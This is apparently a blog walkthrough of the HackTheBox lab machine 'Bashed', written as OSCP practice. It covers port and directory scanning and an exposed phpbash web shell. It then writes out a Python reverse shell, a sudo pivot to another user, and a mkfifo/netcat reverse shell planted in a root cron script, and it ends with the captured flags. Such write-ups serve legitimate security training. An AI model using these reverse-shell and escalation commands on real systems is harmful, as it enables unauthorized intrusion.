HackTheBox | Bashed

In this walkthrough, I demonstrate how I obtained complete ownership of Bashed on HackTheBox
HackTheBox | Bashed
In: TJ Null OSCP Practice, OSCP Prep, HackTheBox, Attack, CTF

Nmap Results

# Nmap 7.93 scan initiated Wed Mar 29 00:20:11 2023 as: nmap -Pn -p- -T5 -A -oN scan.txt 10.129.97.27
Nmap scan report for 10.129.97.27
Host is up (0.014s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.8 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 993/tcp)
HOP RTT      ADDRESS
1   12.31 ms 10.10.14.1
2   12.42 ms 10.129.97.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 29 00:20:34 2023 -- 1 IP address (1 host up) scanned in 23.26 seconds





Service Enumeration

TCP/80

Interesting mention of 'phpbash'
gobuster dir -u http://10.129.97.27 -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -x php,html -t 100 -o gobuster.txt

/about.html           (Status: 200) [Size: 8193]
/config.php           (Status: 200) [Size: 0]
/contact.html         (Status: 200) [Size: 7805]
/css                  (Status: 200) [Size: 1759]
/dev                  (Status: 200) [Size: 1149]
/fonts                (Status: 200) [Size: 2096]
/images               (Status: 200) [Size: 1565]
/index.html           (Status: 200) [Size: 7743]
/js                   (Status: 200) [Size: 3166]
/php                  (Status: 200) [Size: 940]
/scroll.html          (Status: 200) [Size: 10863]
/single.html          (Status: 200) [Size: 7477]
/uploads              (Status: 200) [Size: 14]

Looking at the output, the most immediately interesting resources are:

  • /dev/
  • /php/
  • /uploads

And just like that, we foudn the phpbash.php script:

Great, so we've got command execution on the target! Let's see if I can ping my VPN IP.

Excellent! We can communicate back to my Kali instance, so the prospects of a reverse shell have become that much more promising. Netcat is installed on the target, but does not support the -e parameter.

Python is installed on the target





Exploit

The system administrator made globally readable a sensitive directory on the web server. This directory contains a PHP script that allows an unauthenticated user to execture arbitrary commands on the remote server. This directory should not be globally readable and ideally the development environment should be isolated away in a non-public network.

Reverse Shell

Attack Box

sudo rlwrap nc -lnvp 80



Target

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<vpn-ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Substitute '<vpn-ip>' and '<port>' with the appropriate values





Post-Exploit Enumeration

Operating Environment

OS & Kernel

NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
    
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL



Users and Groups

Local Users

arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash
scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash

Local Groups

arrexel:x:1000:
adm:x:4:syslog,arrexel
cdrom:x:24:arrexel
sudo:x:27:arrexel
dip:x:30:arrexel
plugdev:x:46:arrexel
arrexel:x:1000:
lpadmin:x:114:arrexel
sambashare:x:115:arrexel

scriptmanager:x:1001:



Network Configurations

Interfaces

ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:4b:66 brd ff:ff:ff:ff:ff:ff
    inet 10.129.97.27/16 brd 10.129.255.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:4b66/64 scope global mngtmpaddr dynamic 
       valid_lft 86394sec preferred_lft 14394sec
    inet6 fe80::250:56ff:feb9:4b66/64 scope link 
       valid_lft forever preferred_lft forever

Open Ports

All open ports previously enumerated.



Interesting Files

/scripts/test.py

Permission denied (see privilege escalation)

/scripts/test.txt

Permission denied (see privilege escalation)





Privilege Escalation

Lateral Pivot

The most obvious privilege escalation path from the initial access is the output from sudo -l command above when enumerating the current user, as it showed that we can run any command as the user scriptmanager without the need for a password. We can use this to spawn a Bash sub-process as the user scriptmanager.

sudo -u scriptmanager /bin/bash -ip

Spawn a Bash shell as the user 'scriptmanager'



More Enumeration

From before, we found the interesting /scripts directory, which is owned by the scriptsmanager user.

Read 'test.py'
Read 'test.txt'

There's nothing particularly useful about this script at first glance. It's just opening a file in write mode and adding the text, "testing 123!" to the file. But, you'll notice that the test.txt file that it's reading is owned by root.

That would lead me to believe that the root user has a cron job that runs this script at regular intervals, allowing us to control which file is read and written to using this script.



Test Script Modifications

Let's give it a test:

cd /scripts
cp test.py test.py.orig
sed -i 's/testing\ 123\!/0xBEN was here/' test.py

Overwrite 'testing 123!' with '0xBEN was here'

Then, we'll give it a minute or more to see if the file is overwritten with our new content.

Excellent! We can use this script to get a reverse shell as root.



Reverse Shell as Root

echo -e 'import os\nos.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [vpn-ip] [port] >/tmp/f")' > test.py

Replace [vpn-ip] and [port] with your respective values





Flags

User

30713224fb6d6052e4a3531c810bfdc2

Root

b3f15ad04264315df873221871b3da80
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.